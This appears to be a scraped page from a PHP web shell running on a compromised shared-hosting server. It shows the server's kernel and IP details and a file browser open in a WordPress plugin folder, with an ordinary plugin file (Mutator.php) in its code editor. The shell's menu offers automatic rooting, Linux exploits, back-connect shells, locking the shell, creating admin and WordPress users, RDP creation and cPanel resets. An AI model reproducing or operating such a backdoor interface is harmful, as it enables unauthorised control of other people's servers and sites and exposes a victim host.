Linux business72.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
LiteSpeed
: 162.0.229.97 | : 18.119.109.232
Cant Read [ /etc/named.conf ]
8.1.30
temmmp
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
temmmp /
goldenreviesws.com /
wp-content /
plugins /
copy-delete-posts /
analyst /
src /
[ HOME SHELL ]
Name
Size
Permission
Action
Account
[ DIR ]
drwxr-xr-x
Cache
[ DIR ]
drwxr-xr-x
Contracts
[ DIR ]
drwxr-xr-x
Core
[ DIR ]
drwxr-xr-x
Http
[ DIR ]
drwxr-xr-x
Notices
[ DIR ]
drwxr-xr-x
Analyst.php
2.82
KB
-rw-r--r--
ApiRequestor.php
4.53
KB
-rw-r--r--
ApiResponse.php
532
B
-rw-r--r--
Collector.php
3.3
KB
-rw-r--r--
Mutator.php
3.02
KB
-rw-r--r--
helpers.php
1.64
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Mutator.php
<?php namespace Analyst; use Analyst\Cache\DatabaseCache; use Analyst\Contracts\CacheContract; use Analyst\Notices\NoticeFactory; /** * Class Mutator mutates (modifies) UX with additional * functional */ class Mutator { protected $notices = []; /** * @var NoticeFactory */ protected $factory; /** * @var CacheContract */ protected $cache; public function __construct() { $this->factory = NoticeFactory::instance(); $this->notices = $this->factory->getNotices(); $this->cache = DatabaseCache::getInstance(); } /** * Register filters all necessary stuff. * Can be invoked only once. * * @return void */ public function initialize() { $this->registerLinks(); $this->registerAssets(); $this->registerHooks(); } /** * Register all necessary filters and templates * * @return void */ protected function registerLinks() { add_action('admin_footer', function () { analyst_require_template('optout.php', [ 'shieldImage' => analyst_assets_url('img/shield_question.png') ]); analyst_require_template('optin.php'); analyst_require_template('forms/deactivate.php', [ 'pencilImage' => analyst_assets_url('img/pencil.png'), 'smileImage' => analyst_assets_url('img/smile.png'), ]); analyst_require_template('forms/install.php', [ 'pluginToInstall' => $this->cache->get('plugin_to_install'), 'shieldImage' => analyst_assets_url('img/shield_success.png'), ]); }); add_action('admin_notices',function () { foreach ($this->notices as $notice) { analyst_require_template('notice.php', ['notice' => $notice]); } }); } /** * Register all assets */ public function registerAssets() { add_action('admin_enqueue_scripts', function () { wp_enqueue_style('analyst_custom', analyst_assets_url('/css/customize.css')); wp_enqueue_script('analyst_custom', analyst_assets_url('/js/customize.js')); wp_localize_script('analyst_custom', 'analyst_opt_localize', array( 'nonce' => wp_create_nonce('analyst_opt_ajax_nonce') )); }); } /** * Register action hooks */ public function registerHooks() { add_action('wp_ajax_analyst_notification_dismiss', function () { $capabilities = [ 'activate_plugins', 'edit_plugins', 'install_plugins', 'update_plugins', 'delete_plugins', 'manage_network_plugins', 'upload_plugins' ]; // Allow if has any of above permissions $hasPerms = false; foreach ($capabilities as $i => $cap) { if (current_user_can($cap)) { $hasPerms = true; break; } } if ($hasPerms == false) { wp_send_json_error(['message' => 'no_permissions']); die; } if (!isset($_POST['nonce']) || !wp_verify_nonce(sanitize_text_field($_POST['nonce']), 'analyst_opt_ajax_nonce')) { wp_send_json_error(['message' => 'invalid_nonce']); die; } $this->factory->remove(sanitize_text_field($_POST['id'])); $this->factory->sync(); }); } }
Close